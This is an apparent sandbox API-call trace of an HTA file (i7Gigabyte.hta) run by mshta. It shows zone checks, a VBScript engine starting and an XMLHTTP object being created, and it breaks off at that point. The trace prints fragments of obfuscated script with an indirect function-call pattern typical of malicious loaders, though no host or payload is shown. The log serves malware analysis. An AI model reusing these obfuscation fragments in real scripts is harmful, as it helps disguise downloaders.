[0083.761] IUri:GetAbsoluteUri (in: This=0x13c184, pbstrAbsoluteUri=0x39fa80 | out: pbstrAbsoluteUri=0x39fa80*="file:///C:/Users/kEecfMwgj/Documents/i7Gigabyte.hta") returned 0x0
[0083.761] IUnknown:Release (This=0x13c184) returned 0x3
[0083.761] LoadLibraryA (lpLibFileName="oleaut32.dll") returned 0x757f0000
[0083.762] GetProcAddress (hModule=0x757f0000, lpProcName="VariantClear") returned 0x757f3eae
[0083.762] ShouldShowIntranetWarningSecband () returned 0x0
[0083.767] GetIUriPriv () returned 0x0
[0083.767] IUnknown:Release (This=0x13c184) returned 0x3
[0083.767] ScreenToClient (in: hWnd=0x1034a, lpPoint=0x39f878 | out: lpPoint=0x39f878) returned 1
[0083.767] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x8, Size=0x30) returned 0x166ed0
[0083.767] GetCurrentThreadId () returned 0xe84
[0083.767] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x166ed0 | out: hHeap=0x110000) returned 1
[0083.767] GetCurrentThreadId () returned 0xe84
[0083.768] GetCurrentThreadId () returned 0xe84
[0083.768] GetFocus () returned 0x1034a
[0083.768] ScreenToClient (in: hWnd=0x1034a, lpPoint=0x39f9e8 | out: lpPoint=0x39f9e8) returned 1
[0083.768] GetClientRect (in: hWnd=0x1034a, lpRect=0x39f9d8 | out: lpRect=0x39f9d8) returned 1
[0083.768] PostMessageW (hWnd=0x1034a, Msg=0x20, wParam=0x34a, lParam=0x1) returned 1
[0083.768] ParseURLW (in: pcszURL="file:///C:/Users/kEecfMwgj/Documents/i7Gigabyte.hta", ppu=0x39f848 | out: ppu=0x39f848) returned 0x0
[0083.768] IUnknown:AddRef (This=0x13c184) returned 0x4
[0083.768] IInternetSecurityManager:MapUrlToZone (in: This=0x73da96bc, pwszUrl="file:///C:/Users/kEecfMwgj/Documents/i7Gigabyte.hta", pdwZone=0x39f7ec, dwFlags=0x0 | out: pdwZone=0x39f7ec*=0xffffffff) returned 0x800c0011
[0083.768] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1
[0083.769] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1
[0083.769] CoInternetIsFeatureEnabled (FeatureEntry=0xe, dwFlags=0x2) returned 0x1
[0083.769] IInternetSecurityManager:ProcessUrlAction (in: This=0x73da96bc, pwszUrl="file:///C:/Users/kEecfMwgj/Documents/i7Gigabyte.hta", dwAction=0x1400, pPolicy=0x39f7f0, cbPolicy=0x4, pContext=0x0, cbContext=0x0, dwFlags=0x40, dwReserved=0x0 | out: pPolicy=0x39f7f0*=0x0) returned 0x0
[0083.769] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1
[0083.769] IUnknown:Release (This=0x13c184) returned 0x3
[0083.769] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x17ead8 | out: hHeap=0x110000) returned 1
[0083.769] ParseURLW (in: pcszURL="file:///C:/Users/kEecfMwgj/Documents/i7Gigabyte.hta", ppu=0x39f804 | out: ppu=0x39f804) returned 0x0
[0083.769] IUnknown:AddRef (This=0x13c184) returned 0x4
[0083.769] IInternetSecurityManager:MapUrlToZone (in: This=0x73da96bc, pwszUrl="file:///C:/Users/kEecfMwgj/Documents/i7Gigabyte.hta", pdwZone=0x39f7a4, dwFlags=0x0 | out: pdwZone=0x39f7a4*=0xffffffff) returned 0x800c0011
[0083.769] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1
[0083.769] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1
[0083.769] CoInternetIsFeatureEnabled (FeatureEntry=0xe, dwFlags=0x2) returned 0x1
[0083.769] IInternetSecurityManager:ProcessUrlAction (in: This=0x73da96bc, pwszUrl="file:///C:/Users/kEecfMwgj/Documents/i7Gigabyte.hta", dwAction=0x1400, pPolicy=0x39f7a8, cbPolicy=0x4, pContext=0x0, cbContext=0x0, dwFlags=0x40, dwReserved=0x0 | out: pPolicy=0x39f7a8*=0x0) returned 0x0
[0083.769] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1
[0083.769] IUnknown:Release (This=0x13c184) returned 0x3
[0083.769] ParseURLW (in: pcszURL="file:///C:/Users/kEecfMwgj/Documents/i7Gigabyte.hta", ppu=0x39f794 | out: ppu=0x39f794) returned 0x0
[0083.769] IUnknown:AddRef (This=0x13c184) returned 0x4
[0083.769] IInternetSecurityManager:MapUrlToZone (in: This=0x73da96bc, pwszUrl="file:///C:/Users/kEecfMwgj/Documents/i7Gigabyte.hta", pdwZone=0x39f734, dwFlags=0x0 | out: pdwZone=0x39f734*=0xffffffff) returned 0x800c0011
[0083.769] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1
[0083.769] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1
[0083.769] CoInternetIsFeatureEnabled (FeatureEntry=0xe, dwFlags=0x2) returned 0x1
[0083.769] IInternetSecurityManager:ProcessUrlAction (in: This=0x73da96bc, pwszUrl="file:///C:/Users/kEecfMwgj/Documents/i7Gigabyte.hta", dwAction=0x1400, pPolicy=0x39f738, cbPolicy=0x4, pContext=0x0, cbContext=0x0, dwFlags=0x40, dwReserved=0x0 | out: pPolicy=0x39f738*=0x0) returned 0x0
[0083.769] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1
[0083.769] IUnknown:Release (This=0x13c184) returned 0x3
[0083.769] GetCurrentThreadId () returned 0xe84
[0083.769] SysStringLen (param_1="file:///C:/Users/kEecfMwgj/Documents/i7Gigabyte.hta") returned 0x33
[0083.770] SysStringLen (param_1="file:///C:/Users/kEecfMwgj/Documents/i7Gigabyte.hta") returned 0x33
[0083.770] StrCmpIW (psz1="file:///C:/Users/kEecfMwgj/Documents/i7Gigabyte.hta", psz2="file:///C:/Users/kEecfMwgj/Documents/i7Gigabyte.hta") returned 0
[0083.770] GetCurrentThreadId () returned 0xe84
[0083.770] realloc (_Block=0x0, _Size=0xc8) returned 0x29b11d0
[0083.770] SysStringLen (param_1="function rtxVideo(processorProcessorVideo){cardTableMonitor[cardI9Processor('processorRtx')](processorProcessorVideo);}") returned 0x77
[0083.770] ??2@YAPAXI@Z () returned 0x29b9ba8
[0083.770] malloc (_Size=0x804) returned 0x29bd778
[0083.770] ??2@YAPAXI@Z () returned 0x29b6798
[0083.770] ??3@YAXPAX@Z () returned 0x1
[0083.770] ??2@YAPAXI@Z () returned 0x29b9bd0
[0083.771] free (_Block=0x29bd778)
[0083.771] ??3@YAXPAX@Z () returned 0x1
[0083.771] free (_Block=0x29b2730)
[0083.771] free (_Block=0x29bdf88)
[0083.771] free (_Block=0x29cbfa8)
[0083.771] free (_Block=0x29cb110)
[0083.771] ??2@YAPAXI@Z () returned 0x29b2730
[0083.771] realloc (_Block=0x29b8a00, _Size=0x30) returned 0x29b2768
[0083.771] ??2@YAPAXI@Z () returned 0x29be6a8
[0083.771] ISystemDebugEventFire:IsActive (This=0x1742d0) returned 0x1
[0083.771] CoGetObjectContext (in: riid=0x663b0270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x39f674 | out: ppv=0x39f674*=0x1369d0) returned 0x0
[0083.771] IUnknown:Release (This=0x1369d0) returned 0x1
[0083.771] ??2@YAPAXI@Z () returned 0x29cb110
[0083.772] ISystemDebugEventFire:IsActive (This=0x1742d0) returned 0x1
[0083.772] GetCurrentThreadId () returned 0xe84
[0083.772] GetCurrentThreadId () returned 0xe84
[0083.772] GetCurrentThreadId () returned 0xe84
[0083.772] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x1905c0 | out: hHeap=0x110000) returned 1
[0083.772] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x14e4f8 | out: hHeap=0x110000) returned 1
[0083.772] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x110000) returned 1
[0083.772] GetCurrentThreadId () returned 0xe84
[0083.772] SetEvent (hEvent=0x1b8) returned 1
[0083.792] ParseURLW (in: pcszURL="file:///C:/Users/kEecfMwgj/Documents/i7Gigabyte.hta", ppu=0x39f848 | out: ppu=0x39f848) returned 0x0
[0083.794] IUnknown:AddRef (This=0x13c184) returned 0x4
[0083.794] IInternetSecurityManager:MapUrlToZone (in: This=0x73da96bc, pwszUrl="file:///C:/Users/kEecfMwgj/Documents/i7Gigabyte.hta", pdwZone=0x39f7ec, dwFlags=0x0 | out: pdwZone=0x39f7ec*=0xffffffff) returned 0x800c0011
[0083.794] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1
[0083.794] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1
[0083.794] CoInternetIsFeatureEnabled (FeatureEntry=0xe, dwFlags=0x2) returned 0x1
[0083.795] IInternetSecurityManager:ProcessUrlAction (in: This=0x73da96bc, pwszUrl="file:///C:/Users/kEecfMwgj/Documents/i7Gigabyte.hta", dwAction=0x1400, pPolicy=0x39f7f0, cbPolicy=0x4, pContext=0x0, cbContext=0x0, dwFlags=0x40, dwReserved=0x0 | out: pPolicy=0x39f7f0*=0x0) returned 0x0
[0083.795] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1
[0083.795] IUnknown:Release (This=0x13c184) returned 0x3
[0083.795] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x17ead8 | out: hHeap=0x110000) returned 1
[0083.795] ParseURLW (in: pcszURL="file:///C:/Users/kEecfMwgj/Documents/i7Gigabyte.hta", ppu=0x39f804 | out: ppu=0x39f804) returned 0x0
[0083.795] IUnknown:AddRef (This=0x13c184) returned 0x4
[0083.795] IInternetSecurityManager:MapUrlToZone (in: This=0x73da96bc, pwszUrl="file:///C:/Users/kEecfMwgj/Documents/i7Gigabyte.hta", pdwZone=0x39f7a4, dwFlags=0x0 | out: pdwZone=0x39f7a4*=0xffffffff) returned 0x800c0011
[0083.795] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1
[0083.795] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1
[0083.795] CoInternetIsFeatureEnabled (FeatureEntry=0xe, dwFlags=0x2) returned 0x1
[0083.795] IInternetSecurityManager:ProcessUrlAction (in: This=0x73da96bc, pwszUrl="file:///C:/Users/kEecfMwgj/Documents/i7Gigabyte.hta", dwAction=0x1400, pPolicy=0x39f7a8, cbPolicy=0x4, pContext=0x0, cbContext=0x0, dwFlags=0x40, dwReserved=0x0 | out: pPolicy=0x39f7a8*=0x0) returned 0x0
[0083.795] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1
[0083.847] IUnknown:Release (This=0x13c184) returned 0x3
[0083.847] ParseURLW (in: pcszURL="file:///C:/Users/kEecfMwgj/Documents/i7Gigabyte.hta", ppu=0x39f794 | out: ppu=0x39f794) returned 0x0
[0083.847] IUnknown:AddRef (This=0x13c184) returned 0x4
[0083.848] IInternetSecurityManager:MapUrlToZone (in: This=0x73da96bc, pwszUrl="file:///C:/Users/kEecfMwgj/Documents/i7Gigabyte.hta", pdwZone=0x39f734, dwFlags=0x0 | out: pdwZone=0x39f734*=0xffffffff) returned 0x800c0011
[0083.848] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1
[0083.848] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1
[0083.848] CoInternetIsFeatureEnabled (FeatureEntry=0xe, dwFlags=0x2) returned 0x1
[0083.848] IInternetSecurityManager:ProcessUrlAction (in: This=0x73da96bc, pwszUrl="file:///C:/Users/kEecfMwgj/Documents/i7Gigabyte.hta", dwAction=0x1400, pPolicy=0x39f738, cbPolicy=0x4, pContext=0x0, cbContext=0x0, dwFlags=0x40, dwReserved=0x0 | out: pPolicy=0x39f738*=0x0) returned 0x0
[0083.848] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1
[0083.848] IUnknown:Release (This=0x13c184) returned 0x3
[0083.848] FaultInIEFeature (in: hWnd=0x1034a, pClassSpec=0x39f760, pQuery=0x0, dwFlags=0x0 | out: pQuery=0x0) returned 0x1
[0083.849] CoCreateInstance (in: rclsid=0x39f784*(Data1=0xb54f3741, Data2=0x5b07, Data3=0x11cf, Data4=([0]=0xa4, [1]=0xb0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4a, [6]=0x55, [7]=0xe8)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x739c95b4*(Data1=0xbb1a2ae1, Data2=0xa4f9, Data3=0x11cf, Data4=([0]=0x8f, [1]=0x20, [2]=0x0, [3]=0x80, [4]=0x5f, [5]=0x2c, [6]=0xd0, [7]=0x64)), ppv=0x39f740 | out: ppv=0x39f740*=0x29b6798) returned 0x0
[0084.771] malloc (_Size=0x80) returned 0x5fda58
[0084.771] __dllonexit () returned 0x66347164
[0084.771] __dllonexit () returned 0x6634717e
[0084.771] __dllonexit () returned 0x66347198
[0084.771] GetUserDefaultLCID () returned 0x409
[0084.771] GetVersion () returned 0x1db10106
[0084.772] DllGetClassObject (in: rclsid=0x13fa60*(Data1=0xb54f3741, Data2=0x5b07, Data3=0x11cf, Data4=([0]=0xa4, [1]=0xb0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4a, [6]=0x55, [7]=0xe8)), riid=0x76ecee84*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x39ea04 | out: ppv=0x39ea04*=0x29be728) returned 0x0
[0084.773] ??2@YAPAXI@Z () returned 0x29be728
[0084.773] VBScriptEngine5:IClassFactory:CreateInstance (in: This=0x29be728, pUnkOuter=0x0, riid=0x39f3b0*(Data1=0xbb1a2ae1, Data2=0xa4f9, Data3=0x11cf, Data4=([0]=0x8f, [1]=0x20, [2]=0x0, [3]=0x80, [4]=0x5f, [5]=0x2c, [6]=0xd0, [7]=0x64)), ppvObject=0x39e9f0 | out: ppvObject=0x39e9f0*=0x29b6798) returned 0x0
[0084.773] ??2@YAPAXI@Z () returned 0x29b6798
[0084.773] GetUserDefaultLCID () returned 0x409
[0084.773] GetACP () returned 0x4e4
[0084.774] VBScriptEngine5:IUnknown:AddRef (This=0x29b6798) returned 0x2
[0084.774] VBScriptEngine5:IUnknown:Release (This=0x29b6798) returned 0x1
[0084.774] VBScriptEngine5:IUnknown:Release (This=0x29be728) returned 0x0
[0084.774] ??3@YAXPAX@Z () returned 0x1
[0084.774] VBScriptEngine5:IUnknown:QueryInterface (in: This=0x29b6798, riid=0x739c95b4*(Data1=0xbb1a2ae1, Data2=0xa4f9, Data3=0x11cf, Data4=([0]=0x8f, [1]=0x20, [2]=0x0, [3]=0x80, [4]=0x5f, [5]=0x2c, [6]=0xd0, [7]=0x64)), ppvObject=0x39f6e4 | out: ppvObject=0x39f6e4*=0x29b6798) returned 0x0
[0084.774] VBScriptEngine5:IUnknown:Release (This=0x29b6798) returned 0x1
[0084.774] IUnknown:AddRef (This=0x13c184) returned 0x4
[0084.774] IInternetSecurityManager:MapUrlToZone (in: This=0x73da96bc, pwszUrl="file:///C:/Users/kEecfMwgj/Documents/i7Gigabyte.hta", pdwZone=0x39f654, dwFlags=0x0 | out: pdwZone=0x39f654*=0xffffffff) returned 0x800c0011
[0084.774] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1
[0084.774] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1
[0084.774] CoInternetIsFeatureEnabled (FeatureEntry=0xe, dwFlags=0x2) returned 0x1
[0084.774] IInternetSecurityManager:ProcessUrlAction (in: This=0x73da96bc, pwszUrl="file:///C:/Users/kEecfMwgj/Documents/i7Gigabyte.hta", dwAction=0x1401, pPolicy=0x39f658, cbPolicy=0x4, pContext=0x0, cbContext=0x0, dwFlags=0x40, dwReserved=0x0 | out: pPolicy=0x39f658*=0x0) returned 0x0
[0084.774] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1
[0084.774] IUnknown:Release (This=0x13c184) returned 0x3
[0084.776] ??2@YAPAXI@Z () returned 0x29b11d0
[0084.776] GetCurrentThreadId () returned 0xe84
[0084.776] ??2@YAPAXI@Z () returned 0x29ca740
[0084.776] ??2@YAPAXI@Z () returned 0x29b9ba8
[0084.776] ??2@YAPAXI@Z () returned 0x29cb190
[0084.776] ??2@YAPAXI@Z () returned 0x29be728
[0084.776] ??2@YAPAXI@Z () returned 0x29cb210
[0084.776] IsValidLocale (Locale=0x409, dwFlags=0x1) returned 1
[0084.776] GetLocaleInfoA (in: Locale=0x409, LCType=0x1004, lpLCData=0x39f58c, cchData=6 | out: lpLCData="1252") returned 5
[0084.776] IsValidCodePage (CodePage=0x4e4) returned 1
[0084.776] GetCurrentThreadId () returned 0xe84
[0084.776] GetCurrentThreadId () returned 0xe84
[0084.776] LoadLibraryExA (lpLibFileName="ole32.dll", hFile=0x0, dwFlags=0x0) returned 0x76e80000
[0084.777] GetProcAddress (hModule=0x76e80000, lpProcName="CoCreateInstance") returned 0x76ec9d0b
[0084.777] CoCreateInstance (in: rclsid=0x6633b234*(Data1=0x6c736db1, Data2=0xbd94, Data3=0x11d0, Data4=([0]=0x8a, [1]=0x23, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xb5, [6]=0x8e, [7]=0x10)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x6633b244*(Data1=0x6c736dc1, Data2=0xab0d, Data3=0x11d0, Data4=([0]=0xa2, [1]=0xad, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xf, [6]=0x27, [7]=0xe8)), ppv=0x29b6974 | out: ppv=0x29b6974*=0x174750) returned 0x0
[0084.777] IUnknown:AddRef (This=0x174750) returned 0x2
[0084.777] GetCurrentProcessId () returned 0xe80
[0084.777] GetCurrentThreadId () returned 0xe84
[0084.777] GetTickCount () returned 0x1446259
[0084.777] ISystemDebugEventFire:BeginSession (This=0x174750, guidSourceID=0x6633b308, strSessionName="VBScript:00003712:00003716:21258841") returned 0x0
[0084.777] GetCurrentThreadId () returned 0xe84
[0084.777] GetCurrentThreadId () returned 0xe84
[0084.778] ??2@YAPAXI@Z () returned 0x29cb260
[0084.778] GetCurrentThreadId () returned 0xe84
[0084.778] StrCmpICW (pszStr1="window", pszStr2="window") returned 0
[0084.778] ??2@YAPAXI@Z () returned 0x29cbfa8
[0084.778] malloc (_Size=0x40) returned 0x29cb290
[0084.778] malloc (_Size=0x104) returned 0x29cc038
[0084.778] ??2@YAPAXI@Z () returned 0x29b1290
[0084.781] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x30) returned 0x166ed0
[0084.782] StrCmpIW (psz1="file:///C:/Users/kEecfMwgj/Documents/i7Gigabyte.hta", psz2="file:///C:/Users/kEecfMwgj/Documents/i7Gigabyte.hta") returned 0
[0084.782] GetCurrentThreadId () returned 0xe84
[0084.782] _wcsicmp (_String1="window", _String2="window") returned 0
[0084.782] realloc (_Block=0x0, _Size=0xc8) returned 0x29bc6e8
[0084.782] _wcsicmp (_String1="", _String2="") returned 0
[0084.782] SysStringLen (param_1="Call rtxVideo(cardComputerMonitor) : Call rtxVideo(rtxI7Super)") returned 0x3e
[0084.782] ??2@YAPAXI@Z () returned 0x29cb2d8
[0084.782] malloc (_Size=0x804) returned 0x29bd778
[0084.782] ??2@YAPAXI@Z () returned 0x29bc7b8
[0084.782] malloc (_Size=0x1004) returned 0x29cd210
[0084.783] ??3@YAXPAX@Z () returned 0x1
[0084.783] malloc (_Size=0x204) returned 0x29bdf88
[0084.783] malloc (_Size=0x40) returned 0x29cc148
[0084.783] malloc (_Size=0x1dc) returned 0x29be198
[0084.783] ??2@YAPAXI@Z () returned 0x29cb308
[0084.783] free (_Block=0x29cd210)
[0084.784] free (_Block=0x29bd778)
[0084.784] ??3@YAXPAX@Z () returned 0x1
[0084.784] free (_Block=0x29cc148)
[0084.784] free (_Block=0x29bdf88)
[0084.784] free (_Block=0x29bc910)
[0084.784] ??2@YAPAXI@Z () returned 0x29cb2d8
[0084.784] ??2@YAPAXI@Z () returned 0x29ca760
[0084.784] malloc (_Size=0xc) returned 0x29be380
[0084.784] ??2@YAPAXI@Z () returned 0x29be750
[0084.784] ISystemDebugEventFire:IsActive (This=0x174750) returned 0x1
[0084.785] GetCurrentThreadId () returned 0xe84
[0084.786] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x30) returned 0x166f08
[0084.786] _wcsicmp (_String1="window", _String2="window") returned 0
[0084.786] ??2@YAPAXI@Z () returned 0x29cc148
[0084.787] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0084.787] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0084.787] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0084.787] GetCurrentThreadId () returned 0xe84
[0084.787] ??2@YAPAXI@Z () returned 0x29c10b8
[0084.787] GetCurrentThreadId () returned 0xe84
[0084.788] _wcsicmp (_String1="window", _String2="window") returned 0
[0084.788] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0084.788] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0084.788] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0084.788] GetCurrentThreadId () returned 0xe84
[0084.788] malloc (_Size=0x24) returned 0x29cc180
[0084.788] ISystemDebugEventFire:IsActive (This=0x1742d0) returned 0x1
[0084.789] CoGetObjectContext (in: riid=0x663b0270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x39ccf4 | out: ppv=0x39ccf4*=0x1369d0) returned 0x0
[0084.789] IUnknown:Release (This=0x1369d0) returned 0x1
[0084.789] CoGetObjectContext (in: riid=0x663b0270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x39cd38 | out: ppv=0x39cd38*=0x1369d0) returned 0x0
[0084.789] IUnknown:Release (This=0x1369d0) returned 0x1
[0084.789] CoGetObjectContext (in: riid=0x663b0270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x39cd7c | out: ppv=0x39cd7c*=0x1369d0) returned 0x0
[0084.789] IUnknown:Release (This=0x1369d0) returned 0x1
[0084.789] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0084.789] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0084.789] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0084.789] IsCharSpaceW (wch=0x67) returned 0
[0084.789] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0084.789] ??2@YAPAXI@Z () returned 0x29bac98
[0084.790] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0084.790] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0084.790] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0084.790] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x28) returned 0x152b78
[0084.790] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x28) returned 0x152ba8
[0084.790] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0084.790] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0084.790] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0084.790] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x14) returned 0x17a510
[0084.791] GetCurrentThreadId () returned 0xe84
[0084.791] ??2@YAPAXI@Z () returned 0x29bacd0
[0084.791] _wcsicmp (_String1="window", _String2="window") returned 0
[0084.791] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0084.791] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0084.791] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0084.791] GetCurrentThreadId () returned 0xe84
[0084.791] malloc (_Size=0x24) returned 0x29bad38
[0084.792] ISystemDebugEventFire:IsActive (This=0x1742d0) returned 0x1
[0084.792] ??2@YAPAXI@Z () returned 0x29bad68
[0084.792] malloc (_Size=0x804) returned 0x29bd778
[0084.792] ??2@YAPAXI@Z () returned 0x29bdf88
[0084.792] realloc (_Block=0x29c13e8, _Size=0x400) returned 0x29c13e8
[0084.792] malloc (_Size=0x1004) returned 0x29cd210
[0084.792] ??3@YAXPAX@Z () returned 0x1
[0084.792] realloc (_Block=0x29bad90, _Size=0x60) returned 0x29bad90
[0084.792] realloc (_Block=0x29bad90, _Size=0x90) returned 0x29bad90
[0084.792] malloc (_Size=0xe00) returned 0x29cea30
[0084.792] ??2@YAPAXI@Z () returned 0x29b8a00
[0084.793] free (_Block=0x29cd210)
[0084.793] free (_Block=0x29bd778)
[0084.793] ??3@YAXPAX@Z () returned 0x1
[0084.793] free (_Block=0x29bad90)
[0084.793] free (_Block=0x29ce220)
[0084.793] free (_Block=0x29ca118)
[0084.793] free (_Block=0x29c9f08)
[0084.793] free (_Block=0x29bc9c8)
[0084.793] ??2@YAPAXI@Z () returned 0x29bad68
[0084.793] ??2@YAPAXI@Z () returned 0x29bada0
[0084.793] ??2@YAPAXI@Z () returned 0x29bc9c8
[0084.793] ??2@YAPAXI@Z () returned 0x29bca10
[0084.793] malloc (_Size=0x40) returned 0x29bca80
[0084.793] malloc (_Size=0x104) returned 0x29c13e8
[0084.794] ??2@YAPAXI@Z () returned 0x29c1708
[0084.797] SysStringLen (param_1=0x0) returned 0x0
[0084.798] GetProcAddress (hModule=0x76e80000, lpProcName="CoGetClassObject") returned 0x76eb54ad
[0084.798] CoGetClassObject (in: rclsid=0x399dec*(Data1=0xf6d90f16, Data2=0x9c73, Data3=0x11d3, Data4=([0]=0xb3, [1]=0x2e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0xb, [7]=0xb4)), dwClsContext=0x15, pvReserved=0x0, riid=0x663b087c*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x399de0 | out: ppv=0x399de0*=0x72cbd5e8) returned 0x0
[0085.413] XMLHTTP:IUnknown:QueryInterface (in: This=0x72cbd5e8, riid=0x663b7884*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x399ddc | out: ppvObject=0x399ddc*=0x0) returned 0x80004002
[0085.474] XMLHTTP:IClassFactory:CreateInstance (in: This=0x72cbd5e8, pUnkOuter=0x0, riid=0x663b0270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x399de4 | out: ppvObject=0x399de4*=0x2da3a10) returned 0x0
[0085.491] XMLHTTP:IUnknown:AddRef (This=0x72cbd5e8) returned 0x1
[0085.491] XMLHTTP:IUnknown:QueryInterface (in: This=0x2da3a10, riid=0x663b5a50*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x399d98 | out: ppvObject=0x399d98*=0x2da3a44) returned 0x0
[0085.492] ??2@YAPAXI@Z () returned 0x29c9f20
[0085.492] XMLHTTP:IObjectWithSite:SetSite (This=0x2da3a44, pUnkSite=0x29c9f20) returned 0x0
[0085.492] XMLHTTP:IUnknown:QueryInterface (in: This=0x29c9f20, riid=0x76eb97c4*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x399c74 | out: ppvObject=0x399c74*=0x0) returned 0x80004002
